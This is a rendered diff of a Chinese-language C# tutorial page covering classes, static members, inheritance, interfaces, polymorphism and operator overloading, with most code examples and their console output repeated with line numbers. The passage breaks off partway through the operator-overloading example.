                                  39
                                  40
                                  41
                                  42
                                  43
                                  44
                                  45
                                  46
                                  47
                                  48
                                  49
                                  50
                                  51
                                  52
                                  53
                                  54
                                  55
                                  56
                                  57
                                  58
                                  using System;
                                  namespace BoxApplication
                                  {
                                  class Box
                                  {
                                  private double length; // 长度
                                  private double breadth; // 宽度
                                  private double height; // 高度
                                  public void setLength(double len)
                                  {
                                  length = len;
                                  }

                                  public void setBreadth(double bre)
                                  {
                                  breadth = bre;
                                  }

                                  public void setHeight(double hei)
                                  {
                                  height = hei;
                                  }
                                  public double getVolume()
                                  {
                                  return length * breadth * height;
                                  }
                                  }
                                  class Boxtester
                                  {
                                  static void Main(string[] args)
                                  {
                                  Box Box1 = new Box(); // 声明 Box1,类型为 Box
                                  Box Box2 = new Box(); // 声明 Box2,类型为 Box
                                  double volume; // 体积


                                  // Box1 详述
                                  Box1.setLength(6.0);
                                  Box1.setBreadth(7.0);
                                  Box1.setHeight(5.0);

                                  // Box2 详述
                                  Box2.setLength(12.0);
                                  Box2.setBreadth(13.0);
                                  Box2.setHeight(10.0);

                                  // Box1 的体积
                                  volume = Box1.getVolume();
                                  Console.WriteLine("Box1 的体积: {0}", volume);

                                  // Box2 的体积
                                  volume = Box2.getVolume();
                                  Console.WriteLine("Box2 的体积: {0}", volume);

                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  2
                                  Box1 的体积: 210
                                  Box2 的体积: 1560

                                  C# 中的构造函数

                                  ​ 类的 构造函数 是类的一个特殊的成员函数,当创建类的新对象时执行

                                  ​ 构造函数的名称与类的名称完全相同,它没有任何返回类型。

                                  @@ -947,8 +945,8 @@

                                  using System;
                                  namespace StaticVarApplication
                                  {
                                  class StaticVar
                                  {
                                  public static int num;
                                  public void count()
                                  {
                                  num++;
                                  }
                                  public static int getNum()
                                  {
                                  return num;
                                  }
                                  }
                                  class StaticTester
                                  {
                                  static void Main(string[] args)
                                  {
                                  StaticVar s = new StaticVar();
                                  s.count();
                                  s.count();
                                  s.count();
                                  Console.WriteLine("变量 num: {0}", StaticVar.getNum());
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  -
                                  变量 num: 3
                                  +
                                  1
                                  2
                                  3
                                  4
                                  5
                                  6
                                  7
                                  8
                                  9
                                  10
                                  11
                                  12
                                  13
                                  14
                                  15
                                  16
                                  17
                                  18
                                  19
                                  20
                                  21
                                  22
                                  23
                                  24
                                  25
                                  26
                                  27
                                  28
                                  using System;
                                  namespace StaticVarApplication
                                  {
                                  class StaticVar
                                  {
                                  public static int num;
                                  public void count()
                                  {
                                  num++;
                                  }
                                  public static int getNum()
                                  {
                                  return num;
                                  }
                                  }
                                  class StaticTester
                                  {
                                  static void Main(string[] args)
                                  {
                                  StaticVar s = new StaticVar();
                                  s.count();
                                  s.count();
                                  s.count();
                                  Console.WriteLine("变量 num: {0}", StaticVar.getNum());
                                  Console.ReadKey();
                                  }
                                  }
                                  }
                                  +
                                  1
                                  变量 num: 3

                                  C# 继承

                                  • C# 继承 | 菜鸟教程 (runoob.com)
                                  • @@ -961,17 +959,17 @@

                                    ​ C# 不支持类的多重继承,但支持接口的多重继承,一个类可以实现多个接口。

                                    ​ **概括来说:**一个类可以继承多个接口,但只能继承自一个类。

                                    ​ C# 中创建派生类的语法如下:

                                    -
                                    <访问修饰符> class <基类>
                                    {
                                    ...
                                    }
                                    class <派生类> : <基类>
                                    {
                                    ...
                                    }
                                    +
                                    1
                                    2
                                    3
                                    4
                                    5
                                    6
                                    7
                                    8
                                    <访问修饰符> class <基类>
                                    {
                                    ...
                                    }
                                    class <派生类> : <基类>
                                    {
                                    ...
                                    }

                                    ​ 派生类会继承基类的成员(字段、方法、属性等),除非它们被明确地标记为私有(private)。

                                    派生类可以通过关键字 base 来调用基类的构造函数和方法。

                                    基类的初始化

                                    -
                                    using System;
                                    namespace RectangleApplication
                                    {
                                    class Rectangle
                                    {
                                    // 成员变量
                                    protected double length;
                                    protected double width;
                                    public Rectangle(double l, double w)
                                    {
                                    length = l;
                                    width = w;
                                    }
                                    public double GetArea()
                                    {
                                    return length * width;
                                    }
                                    public void Display()
                                    {
                                    Console.WriteLine("长度: {0}", length);
                                    Console.WriteLine("宽度: {0}", width);
                                    Console.WriteLine("面积: {0}", GetArea());
                                    }
                                    }//end class Rectangle
                                    class Tabletop : Rectangle
                                    {
                                    private double cost;
                                    public Tabletop(double l, double w) : base(l, w)
                                    { }
                                    public double GetCost()
                                    {
                                    double cost;
                                    cost = GetArea() * 70;
                                    return cost;
                                    }
                                    public void Display()
                                    {
                                    base.Display();
                                    Console.WriteLine("成本: {0}", GetCost());
                                    }
                                    }
                                    class ExecuteRectangle
                                    {
                                    static void Main(string[] args)
                                    {
                                    Tabletop t = new Tabletop(4.5, 7.5);
                                    t.Display();
                                    Console.ReadLine();
                                    }
                                    }
                                    }
                                    -
                                    长度: 4.5
                                    宽度: 7.5
                                    面积: 33.75
                                    成本: 2362.5
                                    +
                                    1
                                    2
                                    3
                                    4
                                    5
                                    6
                                    7
                                    8
                                    9
                                    10
                                    11
                                    12
                                    13
                                    14
                                    15
                                    16
                                    17
                                    18
                                    19
                                    20
                                    21
                                    22
                                    23
                                    24
                                    25
                                    26
                                    27
                                    28
                                    29
                                    30
                                    31
                                    32
                                    33
                                    34
                                    35
                                    36
                                    37
                                    38
                                    39
                                    40
                                    41
                                    42
                                    43
                                    44
                                    45
                                    46
                                    47
                                    48
                                    49
                                    50
                                    51
                                    using System;
                                    namespace RectangleApplication
                                    {
                                    class Rectangle
                                    {
                                    // 成员变量
                                    protected double length;
                                    protected double width;
                                    public Rectangle(double l, double w)
                                    {
                                    length = l;
                                    width = w;
                                    }
                                    public double GetArea()
                                    {
                                    return length * width;
                                    }
                                    public void Display()
                                    {
                                    Console.WriteLine("长度: {0}", length);
                                    Console.WriteLine("宽度: {0}", width);
                                    Console.WriteLine("面积: {0}", GetArea());
                                    }
                                    }//end class Rectangle
                                    class Tabletop : Rectangle
                                    {
                                    private double cost;
                                    public Tabletop(double l, double w) : base(l, w)
                                    { }
                                    public double GetCost()
                                    {
                                    double cost;
                                    cost = GetArea() * 70;
                                    return cost;
                                    }
                                    public void Display()
                                    {
                                    base.Display();
                                    Console.WriteLine("成本: {0}", GetCost());
                                    }
                                    }
                                    class ExecuteRectangle
                                    {
                                    static void Main(string[] args)
                                    {
                                    Tabletop t = new Tabletop(4.5, 7.5);
                                    t.Display();
                                    Console.ReadLine();
                                    }
                                    }
                                    }
                                    +
                                    1
                                    2
                                    3
                                    4
                                    长度: 4.5
                                    宽度: 7.5
                                    面积: 33.75
                                    成本: 2362.5

                                    Tabletop 所定义的 Display() 将会覆盖 Rectangle 所定义的 Display(),如果没有 base.Display(); 语句,则 Rectangle.Display() 将不会执行。

                                    继承接口(Interface Inheritance)

                                    ​ 一个接口可以继承自一个或多个其他接口,派生接口继承了基接口的所有成员。

                                    ​ 派生接口可以扩展基接口的成员列表,但不能改变它们的访问修饰符。

                                    -
                                    using System;

                                    // 定义一个基接口
                                    interface IBaseInterface
                                    {
                                    void Method1();
                                    }

                                    // 定义一个派生接口,继承自基接口
                                    interface IDerivedInterface : IBaseInterface
                                    {
                                    void Method2();
                                    }

                                    // 实现派生接口的类
                                    class MyClass : IDerivedInterface
                                    {
                                    public void Method1()
                                    {
                                    Console.WriteLine("Method1 implementation");
                                    }

                                    public void Method2()
                                    {
                                    Console.WriteLine("Method2 implementation");
                                    }
                                    }

                                    class Program
                                    {
                                    static void Main(string[] args)
                                    {
                                    // 创建 MyClass 类的实例
                                    MyClass obj = new MyClass();

                                    // 调用继承自基接口的方法
                                    obj.Method1();

                                    // 调用派生接口新增的方法
                                    obj.Method2();
                                    }
                                    }
                                    +
                                    1
                                    2
                                    3
                                    4
                                    5
                                    6
                                    7
                                    8
                                    9
                                    10
                                    11
                                    12
                                    13
                                    14
                                    15
                                    16
                                    17
                                    18
                                    19
                                    20
                                    21
                                    22
                                    23
                                    24
                                    25
                                    26
                                    27
                                    28
                                    29
                                    30
                                    31
                                    32
                                    33
                                    34
                                    35
                                    36
                                    37
                                    38
                                    39
                                    40
                                    41
                                    42
                                    using System;

                                    // 定义一个基接口
                                    interface IBaseInterface
                                    {
                                    void Method1();
                                    }

                                    // 定义一个派生接口,继承自基接口
                                    interface IDerivedInterface : IBaseInterface
                                    {
                                    void Method2();
                                    }

                                    // 实现派生接口的类
                                    class MyClass : IDerivedInterface
                                    {
                                    public void Method1()
                                    {
                                    Console.WriteLine("Method1 implementation");
                                    }

                                    public void Method2()
                                    {
                                    Console.WriteLine("Method2 implementation");
                                    }
                                    }

                                    class Program
                                    {
                                    static void Main(string[] args)
                                    {
                                    // 创建 MyClass 类的实例
                                    MyClass obj = new MyClass();

                                    // 调用继承自基接口的方法
                                    obj.Method1();

                                    // 调用派生接口新增的方法
                                    obj.Method2();
                                    }
                                    }

                                    ​ 接口(interface)与类(class)在面向对象编程中有着明显的区别和用途:

                                    1. 定义与用途: @@ -1000,13 +998,13 @@

                                      using System;

                                      // 定义一个基接口
                                      interface IBaseInterface
                                      {
                                      void Method1();
                                      }

                                      // 定义一个派生接口,继承自基接口(接口一样可以继承)
                                      interface IDerivedInterface : IBaseInterface
                                      {
                                      void Method2();
                                      }

                                      // 实现派生接口的类(必须实现,不然编译失败)
                                      class MyClass : IDerivedInterface
                                      {
                                      public void Method1()
                                      {
                                      Console.WriteLine("Method1 implementation");
                                      }

                                      public void Method2()
                                      {
                                      Console.WriteLine("Method2 implementation");
                                      }
                                      }

                                      class Program
                                      {
                                      static void Main(string[] args)
                                      {
                                      // 创建 MyClass 类的实例
                                      MyClass obj = new MyClass();

                                      // 调用继承自基接口的方法
                                      obj.Method1();

                                      // 调用派生接口新增的方法
                                      obj.Method2();
                                      }
                                      }
                                      +
                                      1
                                      2
                                      3
                                      4
                                      5
                                      6
                                      7
                                      8
                                      9
                                      10
                                      11
                                      12
                                      13
                                      14
                                      15
                                      16
                                      17
                                      18
                                      19
                                      20
                                      21
                                      22
                                      23
                                      24
                                      25
                                      26
                                      27
                                      28
                                      29
                                      30
                                      31
                                      32
                                      33
                                      34
                                      35
                                      36
                                      37
                                      38
                                      39
                                      40
                                      41
                                      42
                                      using System;

                                      // 定义一个基接口
                                      interface IBaseInterface
                                      {
                                      void Method1();
                                      }

                                      // 定义一个派生接口,继承自基接口(接口一样可以继承)
                                      interface IDerivedInterface : IBaseInterface
                                      {
                                      void Method2();
                                      }

                                      // 实现派生接口的类(必须实现,不然编译失败)
                                      class MyClass : IDerivedInterface
                                      {
                                      public void Method1()
                                      {
                                      Console.WriteLine("Method1 implementation");
                                      }

                                      public void Method2()
                                      {
                                      Console.WriteLine("Method2 implementation");
                                      }
                                      }

                                      class Program
                                      {
                                      static void Main(string[] args)
                                      {
                                      // 创建 MyClass 类的实例
                                      MyClass obj = new MyClass();

                                      // 调用继承自基接口的方法
                                      obj.Method1();

                                      // 调用派生接口新增的方法
                                      obj.Method2();
                                      }
                                      }

                                      C# 多重继承

                                      ​ C++ 里的多重继承:C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客

                                      ​ 多重继承指的是一个类别可以同时从多于一个父类继承行为与特征的功能。与单一继承相对,单一继承指一个类别只可以继承自一个父类。

                                      C# 不支持多重继承。但是,您可以使用接口来实现多重继承(C# 不支持继承多个基类,但是可以继承多个接口)。下面的程序演示了这点:

                                      -
                                      using System;
                                      namespace InheritanceApplication
                                      {
                                      class Shape
                                      {
                                      public void setWidth(int w)
                                      {
                                      width = w;
                                      }
                                      public void setHeight(int h)
                                      {
                                      height = h;
                                      }
                                      protected int width;
                                      protected int height;
                                      }

                                      // 基类 PaintCost
                                      public interface PaintCost
                                      {
                                      int getPaintCost(int area);

                                      }

                                      // 基类 FlatCost
                                      public interface FlatCost
                                      {
                                      int getFlatCost(int area);

                                      }
                                      // 派生类
                                      class Rectangle : Shape, PaintCost, FlatCost
                                      {
                                      public int getArea()
                                      {
                                      return (width * height);
                                      }
                                      public int getPaintCost(int area)
                                      {
                                      return area * 70;
                                      }
                                      public int getFlatCost(int area)
                                      {
                                      return area * 20;
                                      }
                                      }
                                      class RectangleTester
                                      {
                                      static void Main(string[] args)
                                      {
                                      Rectangle Rect = new Rectangle();
                                      int area;
                                      Rect.setWidth(5);
                                      Rect.setHeight(7);
                                      area = Rect.getArea();
                                      // 打印对象的面积
                                      Console.WriteLine("总面积: {0}", Rect.getArea());
                                      Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
                                      Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
                                      Console.ReadKey();
                                      }
                                      }
                                      }
                                      -
                                      总面积: 35
                                      油漆总成本: $2450
                                      工本费: $700
                                      +
                                      1
                                      2
                                      3
                                      4
                                      5
                                      6
                                      7
                                      8
                                      9
                                      10
                                      11
                                      12
                                      13
                                      14
                                      15
                                      16
                                      17
                                      18
                                      19
                                      20
                                      21
                                      22
                                      23
                                      24
                                      25
                                      26
                                      27
                                      28
                                      29
                                      30
                                      31
                                      32
                                      33
                                      34
                                      35
                                      36
                                      37
                                      38
                                      39
                                      40
                                      41
                                      42
                                      43
                                      44
                                      45
                                      46
                                      47
                                      48
                                      49
                                      50
                                      51
                                      52
                                      53
                                      54
                                      55
                                      56
                                      57
                                      58
                                      59
                                      60
                                      61
                                      62
                                      63
                                      using System;
                                      namespace InheritanceApplication
                                      {
                                      class Shape
                                      {
                                      public void setWidth(int w)
                                      {
                                      width = w;
                                      }
                                      public void setHeight(int h)
                                      {
                                      height = h;
                                      }
                                      protected int width;
                                      protected int height;
                                      }

                                      // 基类 PaintCost
                                      public interface PaintCost
                                      {
                                      int getPaintCost(int area);

                                      }

                                      // 基类 FlatCost
                                      public interface FlatCost
                                      {
                                      int getFlatCost(int area);

                                      }
                                      // 派生类
                                      class Rectangle : Shape, PaintCost, FlatCost
                                      {
                                      public int getArea()
                                      {
                                      return (width * height);
                                      }
                                      public int getPaintCost(int area)
                                      {
                                      return area * 70;
                                      }
                                      public int getFlatCost(int area)
                                      {
                                      return area * 20;
                                      }
                                      }
                                      class RectangleTester
                                      {
                                      static void Main(string[] args)
                                      {
                                      Rectangle Rect = new Rectangle();
                                      int area;
                                      Rect.setWidth(5);
                                      Rect.setHeight(7);
                                      area = Rect.getArea();
                                      // 打印对象的面积
                                      Console.WriteLine("总面积: {0}", Rect.getArea());
                                      Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
                                      Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
                                      Console.ReadKey();
                                      }
                                      }
                                      }
                                      +
                                      1
                                      2
                                      3
                                      总面积: 35
                                      油漆总成本: $2450
                                      工本费: $700

                                      C# 多态性

                                      • C# 多态性 | 菜鸟教程 (runoob.com)
                                      • @@ -1038,7 +1036,7 @@

                                        函数重载

                                        ​ 您可以在同一个范围内对相同的函数名有多个定义。函数的定义必须彼此不同,可以是参数列表中的参数类型不同,也可以是参数个数不同(总之就是参数定义不同)。不同重载只有返回类型不同的函数声明。

                                        -
                                        using System;
                                        namespace PolymorphismApplication
                                        {
                                        public class TestData
                                        {
                                        public int Add(int a, int b, int c)
                                        {
                                        return a + b + c;
                                        }
                                        public int Add(int a, int b)
                                        {
                                        return a + b;
                                        }
                                        }
                                        class Program
                                        {
                                        static void Main(string[] args)
                                        {
                                        TestData dataClass = new TestData();
                                        int add1 = dataClass.Add(1, 2);
                                        int add2 = dataClass.Add(1, 2, 3);

                                        Console.WriteLine("add1 :" + add1);
                                        Console.WriteLine("add2 :" + add2);
                                        }
                                        }
                                        }
                                        +
                                        1
                                        2
                                        3
                                        4
                                        5
                                        6
                                        7
                                        8
                                        9
                                        10
                                        11
                                        12
                                        13
                                        14
                                        15
                                        16
                                        17
                                        18
                                        19
                                        20
                                        21
                                        22
                                        23
                                        24
                                        25
                                        26
                                        27
                                        using System;
                                        namespace PolymorphismApplication
                                        {
                                        public class TestData
                                        {
                                        public int Add(int a, int b, int c)
                                        {
                                        return a + b + c;
                                        }
                                        public int Add(int a, int b)
                                        {
                                        return a + b;
                                        }
                                        }
                                        class Program
                                        {
                                        static void Main(string[] args)
                                        {
                                        TestData dataClass = new TestData();
                                        int add1 = dataClass.Add(1, 2);
                                        int add2 = dataClass.Add(1, 2, 3);

                                        Console.WriteLine("add1 :" + add1);
                                        Console.WriteLine("add2 :" + add2);
                                        }
                                        }
                                        }

                                        动态多态性

                                        ​ 静态多态性(Static Polymorphism)和动态多态性(Dynamic Polymorphism)是面向对象编程中多态性的两种实现方式,它们之间的主要区别在于如何确定调用的具体方法或函数。

                                        @@ -1101,8 +1099,8 @@

                                        using System;
                                        namespace PolymorphismApplication
                                        {
                                        abstract class Shape
                                        {
                                        abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
                                        }

                                        class Rectangle : Shape
                                        {
                                        private int length;
                                        private int width;
                                        public Rectangle(int a = 0, int b = 0)
                                        {
                                        length = a;
                                        width = b;
                                        }
                                        public override int area() // 若要实现继承所定义的函数,使用 override 标记
                                        {
                                        Console.WriteLine("Rectangle 类的面积:");
                                        return (width * length);
                                        }
                                        }

                                        class RectangleTester
                                        {
                                        static void Main(string[] args)
                                        {
                                        Rectangle r = new Rectangle(10, 7);
                                        double a = r.area();
                                        Console.WriteLine("面积: {0}", a);
                                        Console.ReadKey();
                                        }
                                        }
                                        }
                                        -
                                        Rectangle 类的面积:
                                        面积: 70
                                        +
                                        1
                                        2
                                        3
                                        4
                                        5
                                        6
                                        7
                                        8
                                        9
                                        10
                                        11
                                        12
                                        13
                                        14
                                        15
                                        16
                                        17
                                        18
                                        19
                                        20
                                        21
                                        22
                                        23
                                        24
                                        25
                                        26
                                        27
                                        28
                                        29
                                        30
                                        31
                                        32
                                        33
                                        34
                                        35
                                        using System;
                                        namespace PolymorphismApplication
                                        {
                                        abstract class Shape
                                        {
                                        abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
                                        }

                                        class Rectangle : Shape
                                        {
                                        private int length;
                                        private int width;
                                        public Rectangle(int a = 0, int b = 0)
                                        {
                                        length = a;
                                        width = b;
                                        }
                                        public override int area() // 若要实现继承所定义的函数,使用 override 标记
                                        {
                                        Console.WriteLine("Rectangle 类的面积:");
                                        return (width * length);
                                        }
                                        }

                                        class RectangleTester
                                        {
                                        static void Main(string[] args)
                                        {
                                        Rectangle r = new Rectangle(10, 7);
                                        double a = r.area();
                                        Console.WriteLine("面积: {0}", a);
                                        Console.ReadKey();
                                        }
                                        }
                                        }
                                        +
                                        1
                                        2
                                        Rectangle 类的面积:
                                        面积: 70

                                        ​ 当有一个定义在类中的函数需要在继承类中实现时,可以使用虚方法(与 abstract 相比,virtual 可以在基类中定义实现)。

                                        • @@ -1119,19 +1117,19 @@

                                          using System;
                                          using System.Collections.Generic;

                                          public abstract class Shape
                                          {
                                          public int X { get; private set; }
                                          public int Y { get; private set; }
                                          public int Height { get; set; }
                                          public int Width { get; set; }

                                          // 虚方法
                                          public virtual void Draw()
                                          {
                                          Console.WriteLine("执行基类的画图任务");
                                          }
                                          }

                                          class Circle : Shape
                                          {
                                          public override void Draw() // 同样使用 override
                                          {
                                          Console.WriteLine("画一个圆形");
                                          base.Draw();
                                          }
                                          }
                                          class Rectangle : Shape
                                          {
                                          public override void Draw()
                                          {
                                          Console.WriteLine("画一个长方形");
                                          base.Draw();
                                          }
                                          }
                                          class Triangle : Shape
                                          {
                                          public override void Draw()
                                          {
                                          Console.WriteLine("画一个三角形");
                                          base.Draw();
                                          }
                                          }

                                          class Program
                                          {
                                          static void Main(string[] args)
                                          {
                                          // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
                                          var shapes = new List<Shape>
                                          {
                                          new Rectangle(),
                                          new Triangle(),
                                          new Circle()
                                          };

                                          // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
                                          foreach (var shape in shapes)
                                          {
                                          shape.Draw();
                                          }

                                          Console.WriteLine("按下任意键退出。");
                                          Console.ReadKey();
                                          }

                                          }
                                          -
                                          画一个长方形
                                          执行基类的画图任务
                                          画一个三角形
                                          执行基类的画图任务
                                          画一个圆形
                                          执行基类的画图任务
                                          按下任意键退出。
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          8
                                          9
                                          10
                                          11
                                          12
                                          13
                                          14
                                          15
                                          16
                                          17
                                          18
                                          19
                                          20
                                          21
                                          22
                                          23
                                          24
                                          25
                                          26
                                          27
                                          28
                                          29
                                          30
                                          31
                                          32
                                          33
                                          34
                                          35
                                          36
                                          37
                                          38
                                          39
                                          40
                                          41
                                          42
                                          43
                                          44
                                          45
                                          46
                                          47
                                          48
                                          49
                                          50
                                          51
                                          52
                                          53
                                          54
                                          55
                                          56
                                          57
                                          58
                                          59
                                          60
                                          61
                                          62
                                          63
                                          64
                                          65
                                          using System;
                                          using System.Collections.Generic;

                                          public abstract class Shape
                                          {
                                          public int X { get; private set; }
                                          public int Y { get; private set; }
                                          public int Height { get; set; }
                                          public int Width { get; set; }

                                          // 虚方法
                                          public virtual void Draw()
                                          {
                                          Console.WriteLine("执行基类的画图任务");
                                          }
                                          }

                                          class Circle : Shape
                                          {
                                          public override void Draw() // 同样使用 override
                                          {
                                          Console.WriteLine("画一个圆形");
                                          base.Draw();
                                          }
                                          }
                                          class Rectangle : Shape
                                          {
                                          public override void Draw()
                                          {
                                          Console.WriteLine("画一个长方形");
                                          base.Draw();
                                          }
                                          }
                                          class Triangle : Shape
                                          {
                                          public override void Draw()
                                          {
                                          Console.WriteLine("画一个三角形");
                                          base.Draw();
                                          }
                                          }

                                          class Program
                                          {
                                          static void Main(string[] args)
                                          {
                                          // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
                                          var shapes = new List<Shape>
                                          {
                                          new Rectangle(),
                                          new Triangle(),
                                          new Circle()
                                          };

                                          // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
                                          foreach (var shape in shapes)
                                          {
                                          shape.Draw();
                                          }

                                          Console.WriteLine("按下任意键退出。");
                                          Console.ReadKey();
                                          }

                                          }
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          画一个长方形
                                          执行基类的画图任务
                                          画一个三角形
                                          执行基类的画图任务
                                          画一个圆形
                                          执行基类的画图任务
                                          按下任意键退出。

                                          ​ 下面的程序演示通过虚方法 area() 来计算不同形状图像的面积(同样的语句,底层执行不同的代码):

                                          -
                                          using System;
                                          namespace PolymorphismApplication
                                          {
                                          class Shape
                                          {
                                          protected int width, height;
                                          public Shape( int a=0, int b=0)
                                          {
                                          width = a;
                                          height = b;
                                          }
                                          public virtual int area()
                                          {
                                          Console.WriteLine("父类的面积:");
                                          return 0;
                                          }
                                          }
                                          class Rectangle: Shape
                                          {
                                          public Rectangle( int a=0, int b=0): base(a, b)
                                          {

                                          }
                                          public override int area ()
                                          {
                                          Console.WriteLine("Rectangle 类的面积:");
                                          return (width * height);
                                          }
                                          }
                                          class Triangle: Shape
                                          {
                                          public Triangle(int a = 0, int b = 0): base(a, b)
                                          {

                                          }
                                          public override int area()
                                          {
                                          Console.WriteLine("Triangle 类的面积:");
                                          return (width * height / 2);
                                          }
                                          }
                                          class Caller
                                          {
                                          public void CallArea(Shape sh)
                                          {
                                          int a;
                                          a = sh.area();
                                          Console.WriteLine("面积: {0}", a);
                                          }
                                          }
                                          class Tester
                                          {

                                          static void Main(string[] args)
                                          {
                                          Caller c = new Caller();
                                          Rectangle r = new Rectangle(10, 7);
                                          Triangle t = new Triangle(10, 5);
                                          c.CallArea(r);
                                          c.CallArea(t);
                                          Console.ReadKey();
                                          }
                                          }
                                          }
                                          -
                                          Rectangle 类的面积:
                                          面积: 70
                                          Triangle 类的面积:
                                          面积: 25
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          8
                                          9
                                          10
                                          11
                                          12
                                          13
                                          14
                                          15
                                          16
                                          17
                                          18
                                          19
                                          20
                                          21
                                          22
                                          23
                                          24
                                          25
                                          26
                                          27
                                          28
                                          29
                                          30
                                          31
                                          32
                                          33
                                          34
                                          35
                                          36
                                          37
                                          38
                                          39
                                          40
                                          41
                                          42
                                          43
                                          44
                                          45
                                          46
                                          47
                                          48
                                          49
                                          50
                                          51
                                          52
                                          53
                                          54
                                          55
                                          56
                                          57
                                          58
                                          59
                                          60
                                          61
                                          62
                                          63
                                          64
                                          using System;
                                          namespace PolymorphismApplication
                                          {
                                          class Shape
                                          {
                                          protected int width, height;
                                          public Shape( int a=0, int b=0)
                                          {
                                          width = a;
                                          height = b;
                                          }
                                          public virtual int area()
                                          {
                                          Console.WriteLine("父类的面积:");
                                          return 0;
                                          }
                                          }
                                          class Rectangle: Shape
                                          {
                                          public Rectangle( int a=0, int b=0): base(a, b)
                                          {

                                          }
                                          public override int area ()
                                          {
                                          Console.WriteLine("Rectangle 类的面积:");
                                          return (width * height);
                                          }
                                          }
                                          class Triangle: Shape
                                          {
                                          public Triangle(int a = 0, int b = 0): base(a, b)
                                          {

                                          }
                                          public override int area()
                                          {
                                          Console.WriteLine("Triangle 类的面积:");
                                          return (width * height / 2);
                                          }
                                          }
                                          class Caller
                                          {
                                          public void CallArea(Shape sh)
                                          {
                                          int a;
                                          a = sh.area();
                                          Console.WriteLine("面积: {0}", a);
                                          }
                                          }
                                          class Tester
                                          {

                                          static void Main(string[] args)
                                          {
                                          Caller c = new Caller();
                                          Rectangle r = new Rectangle(10, 7);
                                          Triangle t = new Triangle(10, 5);
                                          c.CallArea(r);
                                          c.CallArea(t);
                                          Console.ReadKey();
                                          }
                                          }
                                          }
                                          +
                                          1
                                          2
                                          3
                                          4
                                          Rectangle 类的面积:
                                          面积: 70
                                          Triangle 类的面积:
                                          面积: 25

                                          C# 运算符重载

                                          您可以重定义或重载 C# 中内置的运算符。因此,程序员也可以使用用户自定义类型的运算符。重载运算符是具有特殊名称的函数,是通过关键字 operator 后跟运算符的符号来定义的。与其他函数一样,重载运算符有返回类型和参数列表。

                                          运算符重载的实现

                                          -
                                          using System;

                                          namespace OperatorOvlApplication
                                          {
                                          class Box
                                          {
                                          private double length; // 长度
                                          private double breadth; // 宽度
                                          private double height; // 高度

                                          public double getVolume()
                                          {
                                          return length * breadth * height;
                                          }
                                          public void setLength( double len )
                                          {
                                          length = len;
                                          }

                                          public void setBreadth( double bre )
                                          {
                                          breadth = bre;
                                          }

                                          public void setHeight( double hei )
                                          {
                                          height = hei;
                                          }
                                          // 重载 + 运算符来把两个 Box 对象相加
                                          public static Box operator+ (Box b, Box c)
                                          {
                                          Box box = new Box();
                                          box.length = b.length + c.length;
                                          box.breadth = b.breadth + c.breadth;
                                          box.height = b.height + c.height;
                                          return box;
                                          }

                                          }

                                          class Tester
                                          {
                                          static void Main(string[] args)
                                          {
                                          Box Box1 = new Box(); // 声明 Box1,类型为 Box
                                          Box Box2 = new Box(); // 声明 Box2,类型为 Box
                                          Box Box3 = new Box(); // 声明 Box3,类型为 Box
                                          double volume = 0.0; // 体积

                                          // Box1 详述
                                          Box1.setLength(6.0);
                                          Box1.setBreadth(7.0);
                                          Box1.setHeight(5.0);

                                          // Box2 详述
                                          Box2.setLength(12.0);
                                          Box2.setBreadth(13.0);
                                          Box2.setHeight(10.0);

                                          // Box1 的体积
                                          volume = Box1.getVolume();
                                          Console.WriteLine("Box1 的体积: {0}", volume);

                                          // Box2 的体积
                                          volume = Box2.getVolume();
                                          Console.WriteLine("Box2 的体积: {0}", volume);

                                          // 把两个对象相加
                                          Box3 = Box1 + Box2;

                                          // Box3 的体积
                                          volume = Box3.getVolume();
                                          Console.WriteLine("Box3 的体积: {0}", volume);
                                          Console.ReadKey();
                                          }
                                          }
                                          }
                                          -
                                          Box1 的体积: 210
                                          Box2 的体积: 1560
                                          Box3 的体积: 5400
                                          +
                                          1
                                          2
                                          3
                                          4
                                          5
                                          6
                                          7
                                          8
                                          9
                                          10
                                          11
                                          12
                                          13
                                          14
                                          15
                                          16
                                          17
                                          18
                                          19
                                          20
                                          21
                                          22
                                          23
                                          24
                                          25
                                          26
                                          27
                                          28
                                          29
                                          30
                                          31
                                          32
                                          33
                                          34
                                          35
                                          36
                                          37
                                          38
                                          39
                                          40
                                          41
                                          42
                                          43
                                          44
                                          45
                                          46
                                          47
                                          48
                                          49
                                          50
                                          51
                                          52
                                          53
                                          54
                                          55
                                          56
                                          57
                                          58
                                          59
                                          60
                                          61
                                          62
                                          63
                                          64
                                          65
                                          66
                                          67
                                          68
                                          69
                                          70
                                          71
                                          72
                                          73
                                          74
                                          75
                                          76
                                          77
                                          using System;

                                          namespace OperatorOvlApplication
                                          {
                                          class Box
                                          {
                                          private double length; // 长度
                                          private double breadth; // 宽度
                                          private double height; // 高度

                                          public double getVolume()
                                          {
                                          return length * breadth * height;
                                          }
                                          public void setLength( double len )
                                          {
                                          length = len;
                                          }

                                          public void setBreadth( double bre )
                                          {
                                          breadth = bre;
                                          }

                                          public void setHeight( double hei )
                                          {
                                          height = hei;
                                          }
                                          // 重载 + 运算符来把两个 Box 对象相加
                                          public static Box operator+ (Box b, Box c)
                                          {
                                          Box box = new Box();
                                          box.length = b.length + c.length;
                                          box.breadth = b.breadth + c.breadth;
                                          box.height = b.height + c.height;
                                          return box;
                                          }

                                          }

                                          class Tester
                                          {
                                          static void Main(string[] args)
                                          {
                                          Box Box1 = new Box(); // 声明 Box1,类型为 Box
                                          Box Box2 = new Box(); // 声明 Box2,类型为 Box
                                          Box Box3 = new Box(); // 声明 Box3,类型为 Box
                                          double volume = 0.0; // 体积

